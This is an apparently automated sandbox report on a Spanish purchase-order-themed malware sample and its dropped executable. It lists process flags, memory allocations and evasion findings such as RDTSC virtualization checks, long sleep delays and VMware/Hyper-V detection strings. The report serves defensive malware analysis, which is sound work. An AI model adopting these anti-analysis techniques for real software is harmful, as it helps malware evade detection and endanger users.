          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: Orden de compra 0307AR24.exe PID: 2572, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RggSaCWUvAyNK.exe PID: 7360, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 29D9904 second address: 29D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 29D9B7E second address: 29D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 2809904 second address: 280990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 2809B7E second address: 2809B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: 9070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: A070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: A280000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: B280000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: B6A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: C6A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: D6A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: E6A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: F6A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: 106A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: 116A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 4AB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 8540000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 6F00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 9540000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: A540000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: A900000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: B900000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: C900000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: DB70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: EB70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: FB70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: 10B70000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3964Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5427Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1545Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9852Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 815Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 804Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 9837
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 2.2 %
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe TID: 508Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep count: 9852 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep time: -19704000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep count: 87 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep time: -174000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe TID: 7408Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700Thread sleep count: 134 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700Thread sleep time: -268000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700Thread sleep count: 9837 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700Thread sleep time: -19674000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 0000000A.00000003.2984822872.00000000097EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
          Source: explorer.exe, 0000000A.00000003.3075767239.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 0000000A.00000002.4554376951.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C24C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000A.00000003.3075767239.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 0000000A.00000000.2169644261.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
